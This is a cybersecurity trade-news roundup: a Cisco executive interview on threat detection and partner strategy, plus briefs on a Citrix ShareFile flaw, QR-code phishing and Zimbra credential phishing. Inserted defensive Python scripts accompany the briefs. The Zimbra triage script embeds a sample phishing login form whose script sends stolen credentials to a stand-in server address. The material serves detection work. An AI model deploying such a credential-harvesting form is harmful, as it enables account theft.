The Gately Report: Cisco Partners to Help IT Giant Reach Security Revenue Goal
Plus, CISA adds Citrix ShareFile flaw to its known exploited vulnerabilities catalog.
Channel Futures: MSPs are being forced to beef up their cybersecurity capabilities to meet customers’ increasing demands. How can Cisco help them with this?
Cisco’s AJ Shipley: We provide the products that those MSPs then manage on behalf of their own customers. So first and foremost, the way Cisco helps them is by providing them the full suite of products that they need. We wake up every single day and we think about the bad guy who’s waking up in other parts of the world trying to figure out how to compromise an organization, to either steal intellectual property, get ransomware in there to extort them to pay a ransom or do whatever else that they might want to do. And in some cases conduct cyber warfare in support of kinetic warfare.
So in that vein, you have to provide products that can detect and respond as effectively and as efficiently as possible, and a portfolio to do it because really sophisticated bad guys like that don’t rely on just an email vector to try to exploit an organization with a phishing email, or a multifactor authentication (MFA) push-bombing attack and overwhelming that. They will use whatever tactic and technique at their disposal in order to get into an organization. And if you look at a MITRE ATT&CK matrix, it will show all of the different tactics and techniques that sophisticated adversaries will deploy. The problem is that if you’re not a security vendor that can cover all of those different tactics and techniques with different point products that also talk to each other and work well together in a way that can be managed by those service providers on behalf of that end customer, you’re going to have a really hard time detecting those sophisticated adversaries if you have to try to cobble together a bunch of point products to do it. And that’s what we’re focused on doing for our partners.
CF: How has Cisco’s threat, detection and response portfolio evolved? And is it evolving in response to the changing threat landscape? If so, how?
AJS: So if you look at how MITRE ATT&CK is evolving, the adversaries that they are emulating, we similarly are evolving what we can detect and respond to because adversaries are not sitting still. A really good example of this recently is a lot of companies have been rushing to figure out how generative AI can be helpful for those companies, like very targeted marketing emails in order to better make use of their marketing spend. Adversaries are similarly using those capabilities to craft better phishing emails. In the past we could rely on really bad grammar in an email to detect phishing. We have to use other technologies because the adversaries are advancing.
Similarly, there’s research out there from some other security vendors where they were able to use things like generative AI to write malware with just a few instructions. Those adversaries are doing the exact same thing. And so our tactics and techniques to detect and respond to them have to continuously evolve. So that’s just par for the course. That’s something that we’re constantly doing in the portfolio.
CF: AI and cybersecurity is a big topic right now. How does Cisco fit into that?
AJS: If you listen to Chuck [Robbins’] interview with Jim Cramer on CNBC after our earnings call, he can tell you all about how Cisco is going after the AI space, not only with our Silicon One and building chips to help do really advanced stuff from an AI perspective, but also providing the interconnects between those different GPUs, and organizations wanting to standardize or move to Ethernet to connect that at very high rates of speed. So we play in the space both from a chip perspective and also an interconnect perspective. But also we’re using things like AI to generate policies for firewalls, to make sure that those policies are maximally effective, that we’re providing as much coverage of the attack surface as possible and not having to rely on a human to try to have to craft that. That’s a use of AI for good, to protect against bad guys who are using AI to try to exploit an organization.
Similarly, we are using AI in our detection and response capabilities to summarize what happened so that a highly technical, but overworked and overstressed analyst isn’t now responsible for writing a four-or five-paragraph after-action report that’s going to go up to the board with a whole bunch of highly technical stuff. They can rely on the use of AI to write that after-action report for them that’s going to get it probably 99% right. But more importantly, it’s going to put it in the language that the board can understand so that they can better make decisions next time so that it doesn’t happen again.
CF: How have recent acquisitions helped Cisco beef up its cybersecurity offerings?
AJS: We’ve increased our pace of acquisition here. That doesn’t mean that we’re going to stop innovating organically because we are still continuing to innovate organically and we always will. But we have been very strategic in using acquisitions and we will continue to be acquisitive, and you’ll see more coming to fill gaps or to accelerate capabilities on our portfolio.
Let me give you a couple of examples. Armorblox was an email security company that we recently acquired. We didn’t buy them for their email security product, which is a good product in and of itself. We have an email security product. We bought them for their technology and their talent around AI and large language models (LLMs), and generative AI. While harvesting some of the technology for our existing email security capabilities that we already have, we’re using that tech and talent in that team to really bolster our use of generative AI for things like that policy assistant or that SOC assistant.
Similarly, Oort is a relatively small company, but it is arguable that they created the identity threat detection and response term, or really, how do you detect and respond to the use of identity and identity-based attacks when they’re trying to exploit an organization, which augments Cisco’s really strong offerings around network detection and response, and endpoint detection and response. But identity is the new battleground. So we did that acquisition — it hasn’t closed yet — to add the identity piece to our overall XDR strategy to augment the endpoint in the cloud and the network, but also to bring in the identity piece. And we’ll continue to advance on other capabilities that we bring in from a threat detection and response perspective.
CF: A lot of organizations are having budget challenges. How can Cisco help partners meet these organizations’ cybersecurity needs on a tight budget?
AJS: Customers are finally moving to this idea of vendor consolidation for a lot of the reasons that you mentioned. There are obviously financial benefits to consolidating on vendors. And to be clear, I don’t — and we don’t — think that it’s going to consolidate down to a single vendor. But we do think that there will be probably a half-dozen vendors that organizations consolidate down to. There will be an application vendor, arguably Microsoft, and there will be a networking vendor and security vendor. Cisco thinks that we’re well-positioned to be that platform vendor.
There will be probably some cloud service providers. But there are going to be a handful of vendors, and Cisco being one of those platform players, this is where we get our economies of scale and our economies of scope to be able to help those organizations that might be challenged from a budget perspective, and be able to candidly do creative things with margins … so that we can make sure that we’re getting them as much coverage and capabilities as possible while still fitting into a margin structure. Single-product companies have a really hard time matching that. The way that Cisco helps is by consolidating away a lot of those other point-product vendors and helping customers start to consolidate down to three, four or five platform players. And that’s what we think the environment is going to look like in the next several years.
CF: Does feedback from partners and customers help shape Cisco’s cybersecurity product strategy? If so, how?
AJS: Obviously it does. There’s that old adage that the customer is always right, and we always will take feedback from customers. But also candidly, I think if you build your road maps, features and products based entirely on customer feedback, you’re going to build a product to address a problem that they have right now. But that product is not going to be available right now. It’s going to be available at some point in the future — six to nine, to 12 months in the future. And it’s debatable whether or not that customer is going to have the same problem six to nine, to 12 months in the future that you just now built a product, and have a product and market to go solve. So that’s why you can’t solely build your products based on customer feedback, because they’re going to give you the feedback of the problem that they have right now, not the problem that they think that they’re going to run into nine to 12, to 24 months from now.
There are a few customers or certainly folks in organizations that are thinking about the 12 to 24, to 36 months out, and when you can find those, when you can work with those, those are the ones who are really valuable to partners, from a customer perspective to start to build out your road map with an acknowledgment that no product is in market instantly.
CF: What do you find most dangerous about the current threat landscape?
AJS: One, the problem right now is the availability of these really sophisticated tools is so widespread, and there are all kinds of things on YouTube … on how to use these tools, and that it makes it really challenging, if not impossible, to actually figure out who’s targeting and attacking you. Is that a ransomware gang? Is that a nation-state? Is that an activist? That’s because they all look the same. So that’s challenging in and of itself, because you want to know, “Am I being targeted because I’m a critical infrastructure provider and I’m being targeted by nation-state as a prelude to kinetic warfare? Or am I being targeted by ransomware because they just want to extort some money? Or am I being targeted by my competitor because they want to steal intellectual property?” It’s really hard to distill that out because the tools make everybody look very similar.
Now, you compound that with some of these new technologies that we haven’t even fully thought through in terms of the implications of these new technologies. For example, generative AI is all the rage right now. I read a couple articles where there are these social media influencers who make hundreds of thousands or millions of dollars a year based on followers. Some of these social media influencers are complete AI generations; they’re not real people. They look like a real person and they post like a real person, but it is AI, and some of these folks are making hundreds of thousands to millions of dollars a year. I shouldn’t say folks; I should say these companies.
The thing that scares me is that technology could be used in ways to emulate adversaries or even mimic me. So in the past, you might get a phishing email that says it’s coming from AJ. Now all of a sudden maybe you get some pictures saying, “Hey, sharing some pictures of me from the ballgame last week” — that I was never at — “click on it if you want to see something.” The use of that technology and then the proliferation of these tools where it makes it really hard to figure out who’s targeting me, those two things combined are probably what scares me the most.
CF: In terms of cybersecurity, what can partners expect from Cisco for the remainder of 2023?
AJS: We just announced and launched our new XDR product that has been receiving a tremendous amount of fanfare from customers and analysts. We booked seven-figure deals even before the product launched. And so the demand and the backlog from customers for that new XDR solution is really strong. You’ll see us continue to innovate and announce things around it.
We did the Cohesity announcement for automated ransomware recovery, where we’re partnering with Cohesity to be able to shrink that recovery point objective down to almost zero. And I think you’ll continue to hear about more integrations on that front with other infrastructure providers to really combat ransomware.
In the coming months we’ll have a public preview of our Cisco Secure Access capability, which really secures the user when they’re accessing an application or a device, regardless of where that user is accessing it from and regardless of where that application or that device exists. That user will get a consistent security posture.
We have some stuff coming around Duo. But in general, this notion of suites that we are aligning around, user protection suites to secure that user, cloud protection suites to secure the infrastructure that those users are traversing, and then our breach protection suites to detect and respond when those preventive controls have failed because the adversary is really sophisticated, those capabilities, those suite offerings coming out is what you’ll see for the remainder of 2023.
In other cybersecurity news …
The Cybersecurity and Infrastructure Security Agency (CISA) is warning that a critical Citrix ShareFile secure file transfer vulnerability is being exploited by unknown actors and has added the flaw to its Known Exploited Vulnerabilities (KEV) catalog.
Citrix ShareFile, also known as Citrix Content Collaboration, is a managed file transfer SaaS cloud storage solution that allows customers and employees to upload and download files securely.
“These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise,” CISA said.
Although CISA’s directive (Binding Operational Directive 22-01) only applies to federal civilian executive branch (FCEB) agencies, it “strongly” urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of catalog vulnerabilities as part of their vulnerability management practice.
On June 13, Citrix released a security advisory on a new ShareFile storage zones vulnerability with a critical severity score of 9.8 out of 10, which could allow unauthenticated attackers to compromise customer-managed storage zones.
We couldn’t reach Citrix for an updated comment on this.
Travis Smith, vice president of Qualys’ threat research unit, said this is an interesting vulnerability in “a highly prevalent software with deployment globally in the private sector and in government agencies.”
“Security teams should be concerned that this vulnerability could be exploited to deploy ransomware or exfiltrate data,” he said. “This is very similar to the MOVEit vulnerability that resulted in multiple data breaches. The Qualys threat research unit is closely monitoring the threat landscape to see if this is weaponized.”
John Gallagher, vice president of Viakoo Labs at Viakoo, said organizations need to patch as soon as possible. The open question, he said, is how long threat actors will have to exploit this vulnerability.
“Many organizations lack an inventory of their devices and applications, specifically around what versions they have,” he said. “The ideal situation would be to have full visibility down to the firmware version number, combined with automated patching, and in the future, with software bills of materials tied to each application.”
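The inventory gap Gallagher describes is the practical obstacle to acting on a KEV addition: the catalog names a vendor and product and sets a remediation due date, but it carries no affected-version range, so matching it against your own asset list is the first step and the vendor advisory is the second. The script below is an added example (not Citrix, CISA or Viakoo tooling) that matches a small inventory against a KEV feed. The feed excerpt is constructed in the JSON layout CISA publishes, with synthetic CVE IDs, dates and hostnames.

```python
"""Match a software inventory against the CISA KEV catalog.

Added example. The feed excerpt below is constructed in the JSON layout
CISA publishes (fields cveID, vendorProject, product, vulnerabilityName,
dateAdded, dueDate, requiredAction, knownRansomwareCampaignUse); the CVE
IDs (CVE-2099-*), dates and hostnames are synthetic.
"""
import json
from datetime import date

# Constructed KEV excerpt with synthetic entries.
KEV_FEED_JSON = """
{
  "title": "CISA Catalog of Known Exploited Vulnerabilities",
  "vulnerabilities": [
    {"cveID": "CVE-2099-0001", "vendorProject": "Citrix", "product": "ShareFile",
     "vulnerabilityName": "Citrix ShareFile storage zones vulnerability (synthetic entry)",
     "dateAdded": "2023-08-10", "dueDate": "2023-08-31",
     "requiredAction": "Apply updates per vendor instructions.",
     "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-2099-0002", "vendorProject": "Zimbra", "product": "Collaboration Suite (ZCS)",
     "vulnerabilityName": "Zimbra Collaboration vulnerability (synthetic entry)",
     "dateAdded": "2023-07-20", "dueDate": "2023-08-10",
     "requiredAction": "Apply updates per vendor instructions.",
     "knownRansomwareCampaignUse": "Known"},
    {"cveID": "CVE-2099-0003", "vendorProject": "Progress", "product": "MOVEit Transfer",
     "vulnerabilityName": "MOVEit Transfer vulnerability (synthetic entry)",
     "dateAdded": "2023-06-02", "dueDate": "2023-06-23",
     "requiredAction": "Apply updates per vendor instructions.",
     "knownRansomwareCampaignUse": "Known"}
  ]
}
"""

# Constructed inventory: the minimum an asset database should record.
INVENTORY = [
    {"host": "files01.corp.example", "vendor": "Citrix", "product": "ShareFile", "version": "unknown"},
    {"host": "mail01.corp.example", "vendor": "Zimbra", "product": "Collaboration Suite (ZCS)", "version": "10.0.1"},
    {"host": "app01.corp.example", "vendor": "ExampleVendor", "product": "Widget", "version": "2.0"},
]


def load_kev(feed_text):
    """Parse the KEV feed and return its list of entries."""
    return json.loads(feed_text)["vulnerabilities"]


def _norm(s):
    return " ".join(s.lower().split())


def match_inventory(inventory, kev_entries, today):
    """Return one finding per (asset, KEV entry) pair whose vendor and product match.

    KEV entries carry no affected-version range, so a hit means "check this
    asset against the vendor advisory", not "confirmed vulnerable". Findings
    are ordered by urgency: overdue first, then entries with known ransomware use.
    """
    index = {}
    for entry in kev_entries:
        key = (_norm(entry["vendorProject"]), _norm(entry["product"]))
        index.setdefault(key, []).append(entry)

    findings = []
    for asset in inventory:
        key = (_norm(asset["vendor"]), _norm(asset["product"]))
        for entry in index.get(key, []):
            due = date.fromisoformat(entry["dueDate"])
            findings.append({
                "host": asset["host"],
                "version": asset.get("version", "unknown"),
                "cve": entry["cveID"],
                "days_until_due": (due - today).days,
                "ransomware_use": entry["knownRansomwareCampaignUse"],
                "required_action": entry["requiredAction"],
            })
    findings.sort(key=lambda f: (f["days_until_due"], f["ransomware_use"] != "Known"))
    return findings


def demo(today_iso="2023-08-20"):
    """Run the match on the constructed data for a fixed 'today'."""
    return match_inventory(INVENTORY, load_kev(KEV_FEED_JSON), date.fromisoformat(today_iso))


if __name__ == "__main__":
    for f in demo():
        state = "OVERDUE" if f["days_until_due"] < 0 else f"due in {f['days_until_due']}d"
        print(f"{f['host']:<22} {f['cve']:<14} {state:<12} ransomware={f['ransomware_use']}")
```

Against a live feed you would replace the embedded JSON with the downloaded catalog; the matching logic does not change. The version column is deliberately carried through unchanged: an asset recorded as "unknown" is exactly the case Gallagher warns about, because you cannot close the finding without first establishing what is actually running.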
Cofense has observed a phishing campaign predominantly targeting a notable energy company in the United States, employing QR codes to slip malicious emails into inboxes and bypass security.
Roughly one-third of the 1,000 emails attributed to this campaign targeted a large U.S. energy company, while the remaining attempts were made against firms in manufacturing, insurance, technology and financial services.
According to Cofense, this is the first time QR codes have been used at this scale, indicating that more phishing actors may be testing their effectiveness as an attack vector.
Nathaniel Raymond, threat intelligence analyst at Cofense, said the average month-to-month growth percentage of the campaign is more than 270%. The overall campaign has increased by more than 2,400% since May 2023.
“QR codes are not historically popular as they are limited in the way a user can interact with them,” he said. “Scanning a QR code is limited to the mobile device used, which provides a user with a sneak peek of the link embedded in the QR code and verifies if the user wishes to go to the link. Scanning a QR code on a mobile device puts the user outside the protections of the enterprise environment.”
Mika Aalto, co-founder and CEO at Hoxhunt, said QR phishing is growing in popularity because people got used to scanning QR codes during the COVID-19 pandemic for digital menus, contactless payments and event check-ins.
“We’ve observed a global surge from a phishing campaign posing as Microsoft, in which a fake security update needs to be immediately reviewed and is only accessible via QR code,” he said. “Upon scanning, victims are redirected to a credential-harvesting site personalized to the recipient’s place of business engineered to steal their business account login credentials.”
While QR codes add an extra link in the attack chain, they can lower barriers of trust for users who’ve become accustomed to them as trustworthy gateways to services and sites, Aalto said. Some users might even trust QR codes more than links. Phishing campaigns containing multiple steps to an attack site can disorient the victim to the point they overlook some of the telltales of a phishing attack, while creating a false sense of security.
Additionally, QR codes offer anonymity and flexibility to attackers. The codes can be easily generated and distributed through various channels, including emails, messages or physical stickers placed in public spaces.
“Pointing your phone camera towards the QR code typically reveals the URL it leads to, at which point you should make sure this matches with the email sender,” he said. “Just be careful not to open the link by mistake while doing this. You should also be mindful of using QR code-scanning applications as some might redirect you to malicious websites regardless of what the QR code is.”
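The check Aalto describes, comparing the URL revealed by the camera with the email's sender, can be made mechanical once the QR image has been decoded. The following is an added example, not tooling from Cofense or Hoxhunt: it takes an already-decoded URL plus the From and recipient addresses and returns the reasons the link deserves suspicion, including the personalised-harvesting pattern mentioned above (the recipient's address embedded in the link). QR decoding itself is assumed to happen upstream, and the suffix list used to approximate the registrable domain is a constructed simplification of a public-suffix list. The sample inputs are constructed.

```python
"""Sanity checks on a URL decoded from a QR code in an email.

Added example, not tooling from Cofense or Hoxhunt. Decoding the QR image
is assumed to have happened upstream (a scanner app or library); this
examines only the resulting URL against the sender and recipient
addresses. SAMPLES and the suffix set are constructed.
"""
import base64
import ipaddress
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption: no public-suffix list is available, so approximate it.
_COUNTRY_SECOND_LEVEL = {"co", "com", "org", "net", "gov", "ac", "edu"}


def registrable_domain(host):
    """'mail.example.com' -> 'example.com'; 'a.example.co.uk' -> 'example.co.uk'."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) >= 3 and len(labels[-1]) == 2 and labels[-2] in _COUNTRY_SECOND_LEVEL:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def _is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def check_qr_url(url, sender, recipient):
    """Return the reasons a QR-encoded URL deserves suspicion; [] means no flags."""
    reasons = []
    parts = urlsplit(url.strip())
    host = (parts.hostname or "").lower()

    if parts.scheme not in ("http", "https"):
        reasons.append(f"non-web scheme {parts.scheme!r}")
    elif parts.scheme == "http":
        reasons.append("plain http, not https")
    if not host:
        reasons.append("no host in URL")
        return reasons

    sender_domain = registrable_domain(sender.rsplit("@", 1)[-1])
    if _is_ip_literal(host):
        reasons.append("host is a bare IP address")
    elif registrable_domain(host) != sender_domain:
        reasons.append(f"host {host} is not under sender domain {sender_domain}")
    if any(label.startswith("xn--") for label in host.split(".")):
        reasons.append("punycode label in host (possible homograph)")
    if "@" in parts.netloc:
        reasons.append("userinfo in URL (decoy host before the @)")

    # Personalised harvesting pages often carry the victim's address, plain or base64.
    b64_recipient = base64.b64encode(recipient.encode()).decode().rstrip("=")
    if recipient.lower() in unquote(url).lower() or b64_recipient in url:
        reasons.append("recipient address embedded in URL (pre-filled credential form)")

    query = parse_qs(parts.query)
    for key in ("url", "redirect", "redirect_uri", "next", "return_to"):
        if key in query:
            reasons.append(f"redirect-style parameter {key!r}")
    return reasons


# Constructed samples: (decoded QR URL, From address, recipient address).
SAMPLES = [
    ("https://sso.example.com/login", "it-helpdesk@example.com", "jdoe@example.com"),
    ("https://203.0.113.10/update?u=jdoe%40example.com", "security@example.net", "jdoe@example.com"),
    ("http://xn--secure-update-abc.example.org/r?redirect=https://sso.example.com",
     "it-helpdesk@example.com", "jdoe@example.com"),
]

if __name__ == "__main__":
    for url, sender, recipient in SAMPLES:
        flags = check_qr_url(url, sender, recipient)
        print(f"{url}\n  -> {'clean' if not flags else '; '.join(flags)}")
```

The sender comparison is only as good as the From header, which itself may be spoofed, so treat an empty result as "nothing obviously wrong" rather than "safe"; the value of the check is in the flags it raises, not in the absence of them.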
ESET researchers have uncovered a mass-spreading phishing campaign aimed at collecting Zimbra account users’ credentials. The campaign has been active since at least April and is still ongoing.
Zimbra Collaboration is an open-core collaborative software platform, a popular alternative to enterprise email solutions. The campaign’s targets are a variety of SMBs and governmental entities. According to ESET telemetry, the largest number of targets are located in Poland. However, victims in other European countries such as Ukraine, Italy, France and the Netherlands are also targeted. Latin American nations were hit, too. Ecuador tops the list of detections in that region.
Despite this campaign not being particularly technically sophisticated, it is still able to spread and successfully compromise organizations that use Zimbra Collaboration.
Initially, the target receives an email with a phishing page in an attached HTML file. The email warns the target about an email server update, account deactivation or similar issue, and directs the user to click on the attached file. After opening the attachment, the user is presented with a fake Zimbra login page customized according to the targeted organization. In the background, the submitted credentials are collected from the HTML form and sent to a server controlled by the adversary. Then, the attacker is potentially able to infiltrate the affected email account.
It is likely the attackers were able to compromise the victim’s administrator accounts and created new mailboxes that were then used to send phishing emails to other targets. The campaign observed by ESET relies only on social engineering and user interaction. However, this may not always be the case.
Anton Cherepanov, senior malware researcher at ESET, said there’s no indication of any targets in the United States. However, ESET has identified targets in Mexico.
“The worst-case outcome is that attackers could gain Zimbra administrator’s privileges, and then potentially root privileges on the server itself,” he said. “But it depends on many factors, such as potential password re-use, configuration used, etc.”
Organizations and individuals can protect themselves by using the most up-to-date Zimbra version, strong passwords and two-factor authentication (2FA), Cherepanov said.
“This mass-spreading campaign has already been ongoing for at least several months,” he said. “It’s hard to say what attackers will do next since ESET has just exposed this campaign.”
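The lure described above has a recognisable shape: a standalone HTML attachment carrying a branded login form whose submitted fields go to an adversary-controlled server. That shape can be checked for before the attachment reaches a mailbox. The script below is an added example, not ESET's tooling: it parses a saved HTML attachment with the standard-library HTMLParser and reports password forms that post to a host outside the organisation, password forms with no action at all (those are submitted by script), and inline scripts that send data to an external host. ORG_DOMAINS and SAMPLE_ATTACHMENT are constructed, with the server address taken from the documentation range.

```python
"""Triage an HTML email attachment for a credential-harvesting login form.

Added example, not ESET's tooling. Flags password forms whose action is
outside ORG_DOMAINS, password forms with no action, and inline scripts
that reach an external host. ORG_DOMAINS and SAMPLE_ATTACHMENT are constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

_ABS_URL = re.compile(r"https?://[^\s'\"<>()]+")


class FormCollector(HTMLParser):
    """Collect each <form> with its action and inputs, plus inline script text."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self.scripts = []
        self._current = None
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append(
                {"type": (a.get("type") or "text").lower(), "name": a.get("name") or ""})
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None
        elif tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def _external_host(url, org_domains):
    """Hostname of url if it lies outside org_domains, else None."""
    host = (urlsplit(url).hostname or "").lower()
    if not host:
        return None
    if any(host == d or host.endswith("." + d) for d in org_domains):
        return None
    return host


def triage_html(html, org_domains):
    """Return human-readable findings for a saved HTML attachment; [] means nothing flagged."""
    p = FormCollector()
    p.feed(html)
    p.close()
    findings = []
    for i, form in enumerate(p.forms):
        if not any(inp["type"] == "password" for inp in form["inputs"]):
            continue
        if not form["action"]:
            findings.append(f"form#{i}: password field with no action (likely submitted by script)")
            continue
        ext = _external_host(form["action"], org_domains)
        if ext:
            findings.append(f"form#{i}: password field posts to external host {ext}")
    for script in p.scripts:
        for url in _ABS_URL.findall(script):
            ext = _external_host(url, org_domains)
            if ext:
                findings.append(f"script: request to external host {ext}")
    return findings


ORG_DOMAINS = ("example.com",)

# Constructed lure in the shape the article describes: a branded login page
# in a standalone HTML file, pre-filled with the recipient's address.
SAMPLE_ATTACHMENT = """<html><body>
<h2>Zimbra Web Client - Mail server update</h2>
<form method="post" action="https://203.0.113.45/collect.php">
  <input type="text" name="username" value="jdoe@example.com">
  <input type="password" name="password">
  <input type="submit" value="Sign In">
</form>
<script>
  document.forms[0].onsubmit = function () {
    fetch("https://203.0.113.45/collect.php", {method: "POST", body: new FormData(this)});
  };
</script>
</body></html>"""

if __name__ == "__main__":
    for line in triage_html(SAMPLE_ATTACHMENT, ORG_DOMAINS) or ["no findings"]:
        print(line)
```

A coarser rule is defensible too: a legitimate mail server never asks users to sign in through a file they received as an attachment, so any HTML attachment containing a password field is worth quarantining. The finer checks above tell the analyst where the credentials would have gone.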
Cisco partners will play a crucial role in the IT giant’s goal for cybersecurity to reach over 25% of its annual revenue.
That’s according to AJ Shipley, Cisco’s vice president of product management for threat detection and response. This month, Cisco reported a record-setting $15.2 billion in revenue in its latest quarter, a year-over-year improvement of 11%, with profit of $4 billion. There’s a larger opportunity for Cisco partners.
Cybersecurity isn’t playing as big a role in Cisco’s overall revenue growth “as we like or as we intend it to,” Shipley said.
“And sometimes what gets lost in the noise a little bit is if you look at the bookings and revenue of Cisco security, it’s still a $4 billion-a-year security product business,” he said. “And when you add services in, it ends up being north of $5 billion a year. We’re a $57 billion-a-year company, and so sometimes you get lost in the noise. But if you were to look at our bookings and revenue relative to a Palo Alto Networks or CrowdStrike, it actually makes us the second-largest security vendor out there behind Microsoft, which has actually done pretty amazing things in the last couple of years.”
Cisco Investing in Cybersecurity
Cybersecurity today makes up roughly 10% of Cisco’s overall bookings, Shipley said.
“We expect that security will be a very, very large part of the near-future bookings for Cisco and actually could represent over time 25% plus of the total bookings that Cisco does,” he said. “And the company is investing along those lines, from Chuck Robbins, our CEO, and the board all the way down. Security is the one thing that the entire company across all of Cisco is putting all of their wood behind that arrow in order to get it to that place where it’s in the future, 25% plus of our annual revenue.”
Shipley is in charge of Cisco’s email security, endpoint security, extended detection and response (XDR), network detection and response, cloud-based sandboxing and vulnerability management.
“It’s all of the products that, for the most part, we target at the security operations center (SOC),” he said. “And specifically what we focus on is when all of your preventative security controls have failed and the bad guy has gotten in, we’re focused on how can we detect as quickly as possible and get them out, and get that company back up and running.”
Enabling Cisco Partners
This effort can’t be achieved without Cisco partners, Shipley said.
“The reason for that is because a lot of those organizations just simply don’t have the people on their side in the SOC with the expertise, or can keep those people in seats long enough because they’re jumping around from job to job,” he said. “So they’re looking to outsource a lot of the management of those products and to manage workflows to partners. What we’re focused on from a Cisco perspective – potentially within my area of product portfolio – is how we enable those partners either to be VARs of these products into the SOC. But more importantly in this space, how they can be MSPs and MSSPs, and take the burden off of those end customers of having to manage this and keep people in seats so that their overall security posture stays as resilient as possible, and they’re able to detect and respond as quickly as possible when everything else is failing.”
Want to contact the author directly about this story? Have ideas for a follow-up article? Email Edward Gately or connect with him on LinkedIn.